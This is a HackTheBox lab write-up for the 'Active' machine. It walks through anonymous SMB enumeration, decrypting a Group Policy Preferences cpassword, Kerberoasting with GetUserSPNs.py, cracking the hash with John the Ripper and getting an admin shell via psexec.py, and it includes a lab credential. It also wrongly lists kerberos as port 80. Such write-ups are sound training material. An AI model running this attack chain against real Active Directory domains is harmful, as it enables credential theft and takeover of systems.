HTB - Active Writeup - 10.10.10.100
HackTheBox - Active - 10.10.10.100
Active is a 30 point medium rated machine on hackthebox, it involved locating a groups.xml file and decrypting the cpassword inside to get user. Root required the use of
GetUserSPNs.py to get the tgt of the Admin user who had a service principal name set and finally,
psexec.py to gain an admin shell.
To start this box off we will do an nmap scan of the target machine, 10.10.10.100
nmap -sC -sV -oA nmap/active 10.10.10.100
Nmap Scan Results
# Nmap 7.80 scan initiated Wed Apr 29 12:08:45 2020 as: nmap -sC -sV -oA nmap/active 10.10.10.100 Nmap scan report for 10.10.10.100 Host is up (0.056s latency). Not shown: 983 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-29 11:10:12Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
There are a few things to note here, firstly we have kerberos (port 80), ldap (port 389), rpc (port 135) and smb open on port 445. This tells us that this machine is probably an active directory domain controller, if it was not previously obvious by the machines name.
Firstly we will start by listing smb shares using anonymous credentials:
smbclient -L \\\\10.10.10.100\\ -U ""
From this we can see an unusual share, Replication Let’s try and view the conents of this share
Now to explore the Replication Share, we will use smbclient again:
and as you can see we can access the share using anonymous login, now we can download all the files using the following commands:
The file of note here is the Groups.xml file, this file is used by a windows service called Group Policy Preferences which allows domain admins to roll out passwords for local Administrators over Group Policy, the decryption key was leaked so now any password located inside a Groups.xml file can be decrypted. You can read more about this Here at adsecurity.org
Inside the groups.xml file we see:
The cpassword string is the encrypted password for the user
Decrypting the cpassword
Kali has a built in utility called
gpp-decrypt which will decrypt the cpassword string, you can read more about this tool here.
Now to decrypt the cpassword string from before we can type,
We now have the credentials of the user
SVC_TGS:GPPstillStandingStrong2k18 and we can attempt to connect to the Users SMB Share to grab
smbclient \\\\10.10.10.100\\Users -U svc_tgs
4. Privesc to Domain Admin
Service Principal Names (SPN’s)
Our user account
SVC_TGS is able to find service principal names associated with user accounts in the domain, you could have found this out by having a look at the username and to see the TGT string at the end which signifies that this account may be able to see SPN’s. Through this we are able to get the krb5-tgt of the
Administrator account using a tool called
GetUserSPNs.py from the Impacket Repo on GitHub. If you want to know more about this attack I will leave a link to an ADSecurity article here.
Getting the TGT of the Admin User
The syntax for this command is as follows:
GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -request -dc-ip 10.10.10.100
-dc-ip is the ip of the domain controller, 10.10.10.100 -request means that we want to request the tgt of any user that has a SPN
Bingo!! We can now take this TGT to john the ripper to crack
Cracking the TGT
We will use john the ripper to crack the TGT, first by placing it in a file named
admin.hash and then running the following command to run it against the rockyou.txt wordlist.
john -w=/usr/share/wordlists/rockyou.txt admin.hash
This gives us the credentials,
Now that we hgave the admin credentials we can use the
psexec.py script from Impacket to gain a shell, if you would like to know more about the psexec.py script you can have a look here.
If you enjoyed my write up or found it useful please check out my htb profile linked below and give a +rep